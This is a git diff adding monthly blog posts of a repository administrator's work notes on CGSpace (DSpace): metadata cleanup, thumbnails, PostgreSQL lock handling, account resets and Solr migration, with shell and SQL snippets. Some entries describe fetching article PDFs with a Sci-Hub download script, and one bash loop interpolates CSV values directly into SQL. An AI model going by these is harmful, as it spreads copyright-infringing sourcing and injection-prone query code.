## 2023-05-04
- Sync DSpace Test with CGSpace
- I replaced one item's thumbnail with a WebP version and XMLUI displays it fine
- I spent some time checking the CMYK issue with Arch's ImageMagick 7 and the Docker container and I think ImageMagick 7 just handles CMYK wrong...
- libvips does it correctly automatically and looks closer to the PDF
- Meeting about CG Core types
## 2023-05-10
- Write a script to find the `metadata_field_id` values associated with the non-AGROVOC subjects I am working on for Sara
- This is useful because we want to know who to contact for a definition
- The script was:
```bash
while read -r subject; do
metadata_field_id=$(psql -h localhost -U postgres -d dspacetest -qtAX <<SQL
SELECT DISTINCT(metadata_field_id) FROM metadatavalue WHERE LOWER(text_value)='$subject'
SQL
)
metadata_field_id=$(echo $metadata_field_id | sed 's/[[:space:]]/||/g')
echo "$subject,$metadata_field_id"
done < <(csvcut -c 1 ~/Downloads/2023-04-26\ CGIAR\ non-AGROVOC\ subjects.csv | sed 1d)
```
- I also realized that Bernard Bett didn't have any items on CGSpace tagged with his ORCID identifier, so I tagged 230!
## 2023-05-11
- CG Core meeting
- Finalize looking at the CGSpace non-AGROVOC subjects for FAO
## 2023-05-12
- Export the Alliance community to do some country/region fixes
- I also sent Maria and Francesca the export because they want to add more regions and subregions
- Export the entire CGSpace to check for missing Initiative collection mappings
- I also adding missing regions
## 2023-05-16
- I finally cleaned up and published my latest evaluation of [JPEG, WebP, and AVIF](https://alanorth.github.io/improved-dspace-thumbnails/evaluating-jpeg-webp-avif.html)
- I [filed an issue on DSpace](https://github.com/DSpace/DSpace/issues/8849) to track this
## 2023-05-17
- Re-sync CGSpace to DSpace 7 Test
- I came up with a naive patch to use WebP instead of JPEG in the DSpace ImageMagick filter, and it works, but doesn't replace existing JPEGs... hmmm
- Also, it does PDF to WebP to WebP haha
## 2023-05-18
- I created a [pull request](https://github.com/DSpace/DSpace/pull/8850) to improve some minor documentation, typo, and logic issues in the DSpace ImageMagick thumbnail filters
- I realized that there is a quick win to the generation loss issue with ImageMagickThumbnailFilter
- We can use ImageMagick's internal MIFF instead of JPEG when writing the intermediate image
- According to the [libvips author PNG is very slow](https://github.com/libvips/libvips/issues/571)!
- I re-ran my `generation-loss.sh` script using MIFF and found that it had essentially the same results as PNG, which is about 1.1 points higher on the ssimulacra2 (v2.1) scoring scale
- Also, according to my tests with the cosmo rusage.com utility, I see that MIFF is indeed much faster than PNG
- I updated my pull request to add this quick win
- Weekly CG Core types meeting
- Low attendance so I just kept working on the spreadsheet
- We are at the stage of voting on definitions
## 2023-05-19
- I ported a few of the minor ImageMagick Thumbnail Filter improvements to our `6_x-prod` branch
## 2023-05-20
- I deployed the latest thumbnail changes on CGSpace, ran all updates, and rebooted it
- I exported CGSpace to check for missing Initiative mappings
- Then I started a harvest on AReS
## 2023-05-23
- Help Francesca with an import of a journal article with a few hundred authors
- I used the DSpace 7 live import from PubMed
- I also noticed a bug in the CrossRef live import if you change the DOI field, so I [filed an issue](https://github.com/DSpace/DSpace/issues/8865)
## 2023-05-25
- Meeting on output types
- Make a [pull request on DSpace to capture publisher during live import from Crossref](https://github.com/DSpace/DSpace/pull/8866)
## 2023-05-26
- Make a [pull request on DSpace to update checkstyle](https://github.com/DSpace/DSpace/pull/8868)
- Make a [pull request on DSpace-angular to fix an incorrect i18n UI string](https://github.com/DSpace/dspace-angular/pull/2274)
- I'm experimenting with replacing old thumbnails
- In the past we used to upload thumbnails for journal covers, but those were low quality and look horrible now
- Using the provenance field I want to identify items with 1 bitstream of type gif or jpg, then extract the item IDs along with DOIs:
```sql
\COPY (SELECT
text_value,
dspace_object_id
FROM
metadatavalue
WHERE
dspace_object_id IN (
SELECT
dspace_object_id
FROM
metadatavalue
WHERE
metadata_field_id = 28
AND place = 0
AND (text_value LIKE '%No. of bitstreams: 1%'
AND text_value SIMILAR TO '%.(gif|jpg|jpeg)%'))
AND metadata_field_id = 220) TO /tmp/items-with-old-bitstreams.csv WITH CSV HEADER;
```
- I extract the DOIs and look them up on CrossRef to see which are CC-BY, then extract those:
```console
$ csvcut -c text_value /tmp/items-with-old-bitstreams.csv | sed 1d > /tmp/dois.txt
$ ./ilri/crossref_doi_lookup.py -i /tmp/dois.txt -e fuuu@example.com -o /tmp/dois-resolved.csv
$ csvgrep -c license -m 'creativecommons' /tmp/dois-resolved.csv \
| csvgrep -c license -m 'by-nc-nd' --invert-match \
| csvcut -c doi \
| sed '2,$s_^\(.*\)$_https://doi.org/\1_' \
| sed 1d > /tmp/dois-for-cc-items-with-old-bitstreams.txt
```
- This results in 262 items that have DOIs that are CC-BY (but not ND)
- This is a good starting point, but misses some that had low-quality thumbnails uploaded after they were added (ie, there's no record of a bitstream in the provenance field)
- I ran the list through my Sci-Hub download script and filtered out a few that downloaded invalid PDFs (manually), then generated thumbnails for all of them:
```console
$ ~/src/git/DSpace/ilri/get_scihub_pdfs.py -i /tmp/dois-for-cc-items-with-old-bitstreams.txt -o bitstreams.csv
$ chrt -b 0 vipsthumbnail *.pdf --export-profile srgb -s 600x600 -o './%s.pdf.jpg[Q=02,optimize_coding,strip]'
```
- Then I joined the CSVs on the DOI column, filtered out any that we didn't find PDFs for, and formatted the resulting CSV with an id, filename, and bundle column:
```console
$ csvjoin -c doi bitstreams.csv /tmp/items-with-old-bitstreams.csv \
| csvgrep -c filename --invert-match -r '^$' \
| sed '1s/dspace_object_id/id/' \
| csvcut -c id,filename \
| sed -e '1s/^\(.*\)$/\1,bundle/' -e '2,$s/^\(.*\)$/\1.jpg__description:libvips thumbnail,THUMBNAIL/' > new-thumbnails.csv
```
- I did a dry run with `ilri/post_bitstreams.py` and it seems that most (all?) already have thumbnails from the last time I did a massive Sci-Hub check
- So relying on the provenance field is not very reliable it seems, and that was a waste of two hours...
- I did discover, while originally posting WebP thumbnails, that the format doesn't seem to be set correctly when uploading WebP via the REST API, but it does work when uploading via XMLUI—the format is set to Unknown
- POSTing a JPG to the THUMBNAIL bundle sets the format to JPEG...
- I am guessing that is a bug that I won't bother troubleshooting since the DSpace 6.x REST API is deprecated
## 2023-05-27
- Export CGSpace to check for missing Initiative collection mappings
- Then I also ran the csv-metadata-quality tool on the Initiatives to do some easy fixes like country/region mapping and whitespace fixes
- Start a havest on AReS
## 2023-05-29
- Re-create my local PostgreSQL 14 container:
```console
$ podman rm dspacedb14
$ podman pull docker.io/postgres:14-alpine
$ podman run --name dspacedb14 -v dspacedb14_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d docker.io/postgres:14-alpine -c shared_buffers=1024MB -c random_page_cost=1.1
```
- Export CGSpace again to do some major cleanups in OpenRefine
- I found a few countries that are in the ISO 3166-1 and UN M.49 lists, but not in ours so I added them to the list in `input-forms.xml` and regenerated the controlled vocabularies for the CGSpace Submission Guidelines
- There were a handful of issues with ISSNs, ISBNs, DOIs, access status, licenses, and missing CGIAR Trust Fund donors for Initiatives outputs
- This was about 455 items
- Helping the Alliance web team understand the DSpace REST API for determining which collection an item belongs to
<!-- vim: set sw=2 ts=2: -->

252
content/posts/2023-06.md Normal file
View File

@ -0,0 +1,252 @@
---
title: "June, 2023"
date: 2023-06-02T10:29:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-06-02
- Spend some time testing my `post_bitstreams.py` script to update thumbnails for items on CGSpace
- Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail...
- Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace
- They have experience with improving the MODS interface in MELSpace's OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace
- From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk
<!--more-->
## 2023-06-04
- Upgrade CGSpace to Ubuntu 22.04
- The upgrade was mostly normal, but I had to unhold the openjdk package in order for `do-release-upgrade` to run:
```console
# apt-mark hold openjdk-8-jdk-headless:amd64 openjdk-8-jre-headless:amd64
```
- In [2022-11]({{< relref "2022-11.md" >}}) an upstream Java update broke the DSpace 6 Handle server so we will have to pin this again after the upgrade to Ubuntu 22.04
- After the upgrade I made sure CGSpace was working, then proceeded to upgrade PostgreSQL from 12 to 14, like I did on [DSpace Test in 2023-03]({{< relref "2023-03.md" >}})
- Then I had to downgrade OpenJDK to fix the Handle server using the ones I had previously downloaded for Ubuntu 20.04 because they no longer exist on Launchpad:
```console
# dpkg -i openjdk-8-j*8u342-b07*.deb
```
- Export CGSpace to fix missing Initiative collection mappings
- Start a harvest on AReS
- Work on the DSpace 7 migration a bit more
- I decided to rebase and drop all the submission form edits because they conflict every time upstream changes!
## 2023-06-06
- Fix some incorrect ORCID identifiers for an Alliance author on CGSpace
- Export our list of ORCID identifiers, resolve them, and update the records in CGSpace:
```console
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml 2022-09-22-add-orcids.csv| grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2023-06-06-orcids.txt
$ ./ilri/resolve_orcids.py -i /tmp/2023-06-06-orcids.txt -o /tmp/2023-06-06-orcids-names.txt -d
$ ./ilri/update_orcids.py -i /tmp/2023-06-06-orcids-names.txt -db dspacetest -u dspace -p 'ffff' -m 247
```
- Start working on updating the MODS schema in CGSpace from 3.1 to 3.8 based on Stefano and Salem's work last year
## 2023-06-08
- Continue working on the MODS schema mapping
- Export CGSpace to check and update `dcterms.extent` fields
- I normalized about 1,500 to use either "p. 1-6" or "5 p." format
- Also, I used this GREL expression to extract missing pages from the citation field: `cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*(pp?\.\s?\d+[-]\d+).*/)[0]`
- This was over 4,000 items with a format like "p. 1-6" and "pp. 1-6" in the citation
- I used another GREL expression to extract another 5,000: `cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*?(\d+\s+?[Pp]+\.).*/)[0]`
- This was for the format like "1 p." (note we had to protect against the greedy `.*` in the beginning)
- I also did some work to capture a handful of missing DOIs and ISSNs, but it was only about 100 items and I will have to wait until the 10,000+ above finish importing
## 2023-06-09
- I see there are ~200 users in CGSpace that have registered with their CGIAR email address using a password as opposed to using Active Directory:
```sql
SELECT * FROM eperson WHERE email LIKE '%cgiar.org' AND netid IS NOT NULL AND password IS NOT NULL;
```
- I am wondering if I should delete their passwords and tell them use log in using LDAP
- As an initial test I will reset a few accounts including my own that have passwords and salts:
```sql
UPDATE eperson SET password=DEFAULT,salt=DEFAULT,digest_algorithm=DEFAULT WHERE netid IN ('axxxx', 'axxxx', 'bxxxx');
```
- I also decided to reset passwords/salts for CGIAR accounts that have not been active since 2021 (1.5 years ago):
```sql
UPDATE eperson SET password=DEFAULT,salt=DEFAULT,digest_algorithm=DEFAULT WHERE email LIKE '%cgiar.org' AND netid IS NOT NULL AND password IS NOT NULL AND salt IS NOT NULL AND last_active < '2022-01-01'::date;
```
- This was about 100 accounts...
- I will wait some more time before I decide what to do about the more current ones
- Add a few more ORCID identifiers to my list and tag them on CGSpace
## 2023-06-10
- Export CGSpace to check for missing Initiative mappings
- Start a harvest on AReS
## 2023-06-11
- File [an issue](https://github.com/DSpace/DSpace/issues/8900) on DSpace for the `Content-Disposition` bug causing images to get downloaded instead of opened inline
## 2023-06-12
- Export CGSpace to do some more work extracting volume and issue from citations for items where they are missing
- I found and fixed over 7,000!
- Then I found and extracted another 7,000 items with no extents (pages)
- Then I replaced all occurences of en dashes for ranges in pages with regular hyphens
## 2023-06-13
- Last night I finally figured out how to do basic overrides to the simple item view in Angular
- Add a handful of new ORCID identifiers to my list and tag them on CGSpace
- Extract a list of all the proposed actions for CG Core output types and create a [new issue for them on CG Core's GitHub repository](https://github.com/AgriculturalSemantics/cg-core/issues/45)
- Extract a list of all the proposed actions for CG Core output types for MARLO and create [a new issue for them on MARLO's GitHub repository](https://github.com/CCAFS/MARLO/issues/2479)
- Meeting with Indira, Ryan, and Abenet to discuss plans for the DSpace 7 focus group
## 2023-06-14
- Did some more work on the DSpace 7 Test to improve the submission forms and the look and feel
- Extract a list of all the proposed actions for CG Core output types for MEL and create [a new issue for them on MEL's GitHub repository](https://github.com/CodeObia/MEL/issues/11216)
- I filed [an issue about the yarn merge-i18n script](https://github.com/DSpace/dspace-angular/issues/2309)
- I made [a pull request for some Finnish language i18n strings](https://github.com/DSpace/dspace-angular/pull/2306)
- I made [a pull request to lint the i18n en.json5 file](https://github.com/DSpace/dspace-angular/pull/2306)
## 2023-06-15
- A lot more work on DSpace 7
- I tested some pull requests and worked on the style of the item view and homepage
## 2023-06-16
- A lot more work on DSpace 7
- I made [a pull request to adjust font weight in item counts ](https://github.com/DSpace/dspace-angular/pull/2316)
- I made [a pull request to update the ESLint configuration for JSON5](https://github.com/DSpace/dspace-angular/pull/2317)
## 2023-06-17
- Export CGSpace to check for missing Initiative collection mappings
- I also spent some time doing sanity checks on countries, regions, DOIs, and more
- I lowercased all our AGROVOC keywords in `dcterms.subject`:
```sql
dspace=# BEGIN;
BEGIN
dspace=*# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
UPDATE 2392
dspace=*# COMMIT;
COMMIT
```
- Start a harvest on AReS
## 2023-06-19
- Today I started getting an error on DSpace 7 Test
- The page loads, and then when it is almost done it goes blank to white with this in the console:
```console
ERROR DOMException: CSSStyleSheet.cssRules getter: Not allowed to access cross-origin stylesheet
```
- I restarted Angular, but it didn't fix it
- The `yarn test:rest` script shows everything OK, and I haven't changed anything recently...
- I re-compiled the Angular UI using the default theme and it was the same...
- I tried in Firefox Nightly and it works...
- So it must be something related to the browser
- I tried clearing all the session storage / cookies and refreshing and it worked
- I switched back to the CGSpace theme and it happened again
- I had a hunch it might be due to the GDPR cookie plugin in my browser, so I disabled that and then refreshed and it worked... hmmm
- Upload thumbnails for about 42 IITA Journal Articles after resolving their DOIs and making sure they were not CC ND
- I fixed a few bugs in `get_scihub_pdfs.py` in the process
## 2023-06-21
- Stefano got back to me about the MODS OAI-PMH schema test on DSpace Test
- He said that it's fine if we use iso8601 encoding for dates instead of w3cdtf and asked if we can create a custom end point for AGRIS that only includes types like Journal Articles similar to how Salem did it: https://melspace.loc.codeobia.com/oai/agris?verb=ListRecords&metadataPrefix=mods
- I updated DSpace Test with the new date format and said I'd work on the custom AGRIS set
## 2023-06-25
- Export CGSpace to check for missing Initiative collection mappings
- I wanted to start a harvest on AReS but I've seen the load on the server high for a few days and I'm not sure what it is
- I decided to run all updates and reboot it since it's Sunday anyway
## 2023-06-26
- Since the new DSpace 7 will respect newlines in metadata fields I am curious to see how many of our abstracts have poor newlines
- I exported CGSpace and used a custom text facet with this GREL expression in OpenRefine to count the number of newlines in each cell:
```console
value.split('\n').length()
```
- Also useful to check for general length of the text in the cell to make sure it's a reasonably long string
- I spent some time trying to find a pattern that I could use to identify "easy" targets, but there are so many exceptions that it will have to be done manually
- I fixed a few dozen
- Do a bit of work on thumbnails on CGSpace
- I'm trying to troubleshoot the Discovery error I get on DSpace 7:
```console
java.lang.NullPointerException: Cannot invoke "org.dspace.discovery.configuration.DiscoverySearchFilterFacet.getIndexFieldName()" because the return value of "org.dspace.content.authority.DSpaceControlledVocabularyIndex.getFacetConfig()" is null
```
- I reverted to the default `submission-forms.xml` and the `getFacetConfig()` error goes away...
- Kill some long-held locks on CGSpace PostgreSQL, as some users are complaining of slowness in archiving
- I did some testing of the LDAP login issue related to groupmaps
- It does seem to be a regression from the [LDAP auth patch](https://github.com/DSpace/DSpace/pull/8814) from last month, so I [filed an issue](https://github.com/DSpace/DSpace/issues/8920)
- I spent some time on working on Angular and I figured out how to add a custom Angular component to show the UN SDG Goal icons on DSpace 7
## 2023-06-27
- I debugged the NullPointerException and somehow it disappeared
- It seems to be related to the external controlled vocabularies in the submission form
- I removed them all, then added them all back, and now the issue is solved... hmmmm
- Oh now, now they are gone again, sigh...
## 2023-06-28
- Spent a lot of time debugging the browse indexes
- Looking at the [DSpace 7 demo API](https://api7.dspace.org/server/api/discover/browses) I see the four default browse indexes from `dspace.cfg` and the one default `srsc` one that gets automatically enabled from the `<vocabulary>srsc</vocabulary>` in the `submission-forms.xml`
- The same API call on my test DSpace 7 configuration results in the HTTP 500 I've been seeing for some time, and I am pretty sure it's due to the automagic configuration of hierarchical browses based on the submission form
- Yes, if I remove them all from my submission form then this works: http://localhost:8080/server/api/discover/browses
- I went through each of our vocabularies and tested them one by one:
- dcterms-subject: OK
- dc-contributor-author: NO
- cg-creator-identifier: NO
- cg-contributor-affiliation: OK (and with `facetType: "affiliation"` in API response?!)
- cg-contributor-donor: OK (`facetType: "sponsorship"`)
- cg-journal: NO
- cg-coverage-subregion: NO
- cg-species-breed: NO
- Now I need to figure out what it is about those five that causes them to not work!
- Ah, after debugging with someone on the DSpace Slack, I realized that DSpace expects these vocabularies to have corresponding indexes configured in `discovery.xml`, and they must be added as search filters AND sidebar facets.
## 2023-06-29
- I noticed there is now a [patched version of the Handle JAR for DSpace 6.x](https://github.com/DSpace/DSpace/issues/8557#issuecomment-1595340249)
- This fixes the [issue in OpenJDK 1.8.0_352](https://groups.google.com/g/dspace-tech/c/PqjfA5mqG4w/m/FhxI5oXhFwAJ?pli=1), so we can remove the apt pin on JDK now
- I deployed it on CGSpace and it's working!
- I lowercased all our AGROVOC terms because I noticed a few that were not:
```console
dspace=# BEGIN;
BEGIN
dspace=*# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
UPDATE 53
dspace=*# COMMIT;
```
- After more discussion about the NullPointerException related to browse options, I filed [an issue](https://github.com/DSpace/DSpace/issues/8927)
## 2023-06-30
- I added another custom component to display CGIAR Impact Area icons in the DSpace 7 test
<!-- vim: set sw=2 ts=2: -->

324
content/posts/2023-07.md Normal file
View File

@ -0,0 +1,324 @@
---
title: "July, 2023"
date: 2023-07-01T17:14:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-07-01
- Export CGSpace to check for missing Initiative collection mappings
- Start harvesting on AReS
## 2023-07-02
- Minor edits to the `crossref_doi_lookup.py` script while running some checks from 22,000 CGSpace DOIs
## 2023-07-03
- I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect
- I took the more accurate ones from Crossref and updated the items on CGSpace
- I took a few hundred ISBNs as well for where we were missing them
- I also tagged ~4,700 items with missing licenses as "Copyrighted; all rights reserved" based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer
- Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it's usually copyrighted (could still be open access, but we can't tell via Crossref)
- I would be curious to write a script to check the Unpaywall API for open access status...
- In the past I found that their *license* status was not very accurate, but the open access status might be more reliable
- More minor work on the DSpace 7 item views
- I learned some new Angular template syntax
- I created a custom component to show Creative Commons licenses on the simple item page
- I also decided that I don't like the Impact Area icons as a component because they don't have any visual meaning
## 2023-07-04
- Focus group meeting with CGSpace partners about DSpace 7
- I added a themed file selection component to the CGSpace theme
- It displays the bistream description instead of the file name, just like we did in DSpace 6 XMLUI
- I added a custom component to show share icons
## 2023-07-05
- I spent some time trying to update OpenRXV from Angular 9 to 10 to 11 to 12 to 13
- Most things work but there are some minor bugs it seems
- Mishell from CIP emailed me to say she was having problems approving an item on CGSpace
- Looking at PostgreSQL I saw there were a dozen or so locks that were several hours and even over one day old so I killed those processes and told her to try again
## 2023-07-06
- Types meeting
- I wrote a Python script to check Unpaywall for some information about DOIs
## 2023-07-7
- Continue exploring Unpaywall data for some of our DOIs
- In the past I've found their _licensing_ information to not be very reliable (preferring Crossref), but I think their _open access status_ is more reliable, especially when the provider is listed as being the publisher
- Even so, sometimes the version can be "acceptedVersion", which is presumably the author's version, as opposed to the "publishedVersion", which means it's available as open access on the publisher's website
- I did some quality assurance and found ~100 that were marked as Limited Access, but should have been Open Access, and fixed a handful of licenses
- Delete duplicate metadata as described in my DSpace issue from last year: https://github.com/DSpace/DSpace/issues/8253
- Start working on some statistics on AGROVOC usage for my presenation next week
- I used the following SQL query to dump values from all subject fields and lower case them:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(lower(text_value)) AS "subject" FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119)) to /tmp/2023-07-07-cgspace-subjects.csv WITH CSV HEADER;
COPY 26443
Time: 2564.851 ms (00:02.565)
```
- Then I extracted the subjects and looked them up against AGROVOC:
```console
$ csvcut -c subject /tmp/2023-07-07-cgspace-subjects.csv | sed '1d' > /tmp/2023-07-07-cgspace-subjects.txt
$ ./ilri/agrovoc_lookup.py -i /tmp/2023-07-07-cgspace-subjects.txt -o /tmp/2023-07-07-cgspace-subjects-results.csv
```
- I did some more tests with Angular 13 on OpenRXV and found out why the repository type dropdown wasn't working
- It was because of a missing 1-line JSON file in the data directory, which is runtime data, not code
- I copied the data directory from the production serve and rebuild and the site is working well now
- I did a full harvest with plugins and it worked!
- So it seems Angular 13.4.0 will work, yay
## 2023-07-08
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
- The AGROVOC lookup finished, so I checked the number of matches:
```console
$ csvgrep -c 'match type' -r '^.+$' ~/Downloads/2023-07-07-cgspace-subjects-resolved.csv | sed 1d | wc -l
12528
```
- So that's 12,528 out of 26,443 unique terms (47.3%)
- I did a LOT of work on the OpenRXV frontend build dependencies to bring more in line with Angular 13
## 2023-07-10
- I did a lot more work on OpenRXV to test and update dependencies
- I deployed the latest version on the production server
## 2023-07-12
- CGSpace upgrade meeting with Americas and Africa group
## 2023-07-13
- Michael Victor asked me to help Aditi extract some information from CGSpace
- She was interested in journal articles published between 2018 and 2023 with a range of subjects related to drought, flooding, resilience, etc
- I used an advanced query with some AGROVOC terms:
```console
dcterms.issued:[2018 TO 2023] AND dcterms.type:"Journal Article" AND (dcterms.subject:flooding OR dcterms.subject:flood OR dcterms.subject:"extreme weather events" OR dcterms.subject:drought OR dcterms.subject:"drought resistance" OR dcterms.subject:"drought tolerance" OR dcterms.subject:"soil salinity" OR dcterms.subject:"pests of plants" OR dcterms.subject:pests OR dcterms.subject:heat OR dcterms.subject:fertilizers OR dcterms.subject:"fertilizer technology" OR dcterms.subject:"rice fields" OR dcterms.subject:"landscape conservation" OR dcterms.subject:"landscape restoration" OR dcterms.subject:livestock)
```
- Interestingly, some variations of this same exact query produce no search results, and I see this error in the DSpace log:
```console
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dcterms.issued:[2018 TO 2023] AND dcterms.type:"Journal Article" AND (dcterms.subject:flooding OR dcterms.subject:flood OR dcterms.subject:"extreme weather events" OR dcterms.subject:drought OR dcterms.subject:"drought resistance" OR dcterms.subject:"drought tolerance" OR dcterms.subject:"soil salinity" OR dcterms.subject:"pests of plants" OR dcterms.subject:pests OR dcterms.subject:heat OR dcterms.subject:fertilizers OR dcterms.subject:"fertilizer technology" OR dcterms.subject:"rice fields" OR dcterms.subject:livestock OR dcterms.subject:"landscape conservation" OR dcterms.subject:"landscape restoration\"\)': Lexical error at line 1, column 617. Encountered: <EOF> after : "\"landscape restoration\\\"\\)"
```
- It seems to be when there is a quoted search term at the end of the parenthesized group
- For what it's worth this same query worked fine on DSpace 7.6
## 2023-07-15
- Export CGSpace to fix missing Initiative collection mappings
- Start a harvest on AReS
## 2023-07-17
- Rasika had sent me a list of new ORCID identifiers for new IWMI staff so I combined them with our existing list and ran `resolve_orcids.py` to refresh the names in our database
- I updated the list, updated names in the database, and tagged new authors with missing identifiers in existing items
## 2023-07-18
- Meeting with IWMI, IRRI, and IITA colleagues about CGSpace upgrade plans
- Maria from the Alliance mentioned having some submissions stuck on CGSpace
- I looked and found a number of locks stuck for many nineteen, eighteen, and more hours...
- I killed them and told her to try again
```console
$ psql < locks-age.sql | less -S
$ psql < locks-age.sql | grep -E " (19|18|17|16|12):" | awk -F"|" '{print $10}' | sort -u | xargs kill
```
## 2023-07-19
- I had to kill a bunch more locked processes in PostgreSQL, I'm not sure what's going on
- After some discussion about an advanced search bug with Tim on Slack, I filed [an issue on GitHub](https://github.com/DSpace/DSpace/issues/8962)
## 2023-07-20
- I added a new metadata field for CGIAR Impact Platforms (`cg.subject.impactPlatform`) to CGSpace
## 2023-07-22
- Export CGSpace tp fix missing Initiative collections
- Start a harvest on AReS
## 2023-07-24
- Test Salem's new JavaScript-based DSpace Statistics API and send him some feedback
- I noticed a few times that the Solr service on my DSpace 7 instance is getting OOM killed
- I had been using a 4g Solr heap, but maybe we don't need that much
- Tomcat is also using 4.6GB, and then there's PostgreSQL... so perhaps it's all a bit much on this system now
## 2023-07-25
- Start testing exporting DSpace 6 Solr cores to import on DSpace 7:
```console
$ chrt -b 0 dspace solr-export-statistics -i statistics
```
- I'm curious how long it takes and how much data there will be
- The size of the Solr data directory is currently 82GB
- The export took about 2.5 hours and created 6,000 individual CSVs, one for each day of Solr stats
- The size of the exported CSVs is about 88GB
- I will copy just a few years to import on the DSpace 7 test server
- So importing these is going to require removing the Atmire custom fields:
```console
$ dspace solr-import-statistics -i statistics
Exception: Error from server at http://localhost:8983/solr/statistics: ERROR: [doc=1a92472e-e39d-4602-9b4d-da022df8f233] unknown field 'containerCommunity'
org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: Error from server at http://localhost:8983/solr/statistics: ERROR: [doc=1a92472e-e39d-4602-9b4d-da022df8f233] unknown field 'containerCommunity'
at org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:681)
at org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:266)
at org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:248)
at org.apache.solr.client.solrj.SolrClient.request(SolrClient.java:1290)
at org.dspace.util.SolrImportExport.importIndex(SolrImportExport.java:465)
at org.dspace.util.SolrImportExport.main(SolrImportExport.java:148)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:568)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:277)
at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:133)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:98)
```
- I will try using solr-import-export-json, which I've used in the past to skip Atmire custom fields in Solr:
```console
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2022.json -f 'time:[2022-01-01T00\:00\:00Z TO 2022-12-31T23\:59\:59Z]' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,geoIpCountryCode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId,core_update_run_nb
```
- Some users complained that CGSpace was slow and I found a handful of locks that were hours and days old...
- I killed those and told them to try again
- After importing the Solr statistics into DSpace 7 I realized that my DSpace Statistics API will work fine
- I made some minor modifications to the Ansible infrastructure scripts to make sure it is enabled and then activated it on DSpace 7 Test
## 2023-07-26
- Debugging lock issues on CGSpace
- I see the blocking PIDs for some long-held locks are "idle in transaction":
```console
$ ps auxw | grep -E "(1864132|1659487)"
postgres 1659487 0.0 0.5 3269900 197120 ? Ss Jul25 0:03 postgres: 14/main: cgspace cgspace 127.0.0.1(61648) idle in transaction
postgres 1864132 0.1 0.7 3275704 254528 ? Ss 07:27 0:08 postgres: 14/main: cgspace cgspace 127.0.0.1(36998) idle in transaction
postgres 1880388 0.0 0.0 9208 2432 pts/3 S+ 08:48 0:00 grep -E (1864132|1659487)
```
- I used some other scripts and found that those processes were executing the following statement:
```console
select nextval ('public.tasklistitem_seq')
```
- I don't know why these can get blocked for hours without resolution, but for now I just killed them
- For what it's worth [these sequences were removed in DSpace 7.0](https://github.com/DSpace/DSpace/commit/16ae96b4c3d833c2a4acd1f05985d424c3a52bd7) along with the "traditional" item workflow—maybe that means we won't have such contention issues in DSpace 7!
- I wrote a slightly longer regex to match locks that have been stuck for more than 1 hour based on the output of the `locks-age.sql` script and killed them:
```console
$ psql < locks-age.sql | awk -F"|" '/ [[:digit:]][1-9]:[[:digit:]]{2}:[[:digit:]]{2}\./ {print $10}' | sort -u | xargs kill
```
- I filed [an issue for missing Altmetric badges on DSpace 7 Angular](https://github.com/DSpace/dspace-angular/issues/2400)
## 2023-07-27
- Export CGSpace to check countries, regions, types, and Initiatives
- There were a few minor issues in countries and regions, and I noticed 186 items without types!
- Then I ran the file through csv-metadata-quality to make sure items with countries have appropriate regions
- Brief discussion about OpenRXV bugs and fixes with Moayad
- I was toying with the idea of using an expanded whitespace check/fix based on [ESLint's no-irregular-whitespace](https://eslint.org/docs/latest/rules/no-irregular-whitespace) rule in csv-metadata-quality
- I found 176 items in CGSpace with such whitespace in their titles alone
- I compared the results of removing these characters and replacing them with a space
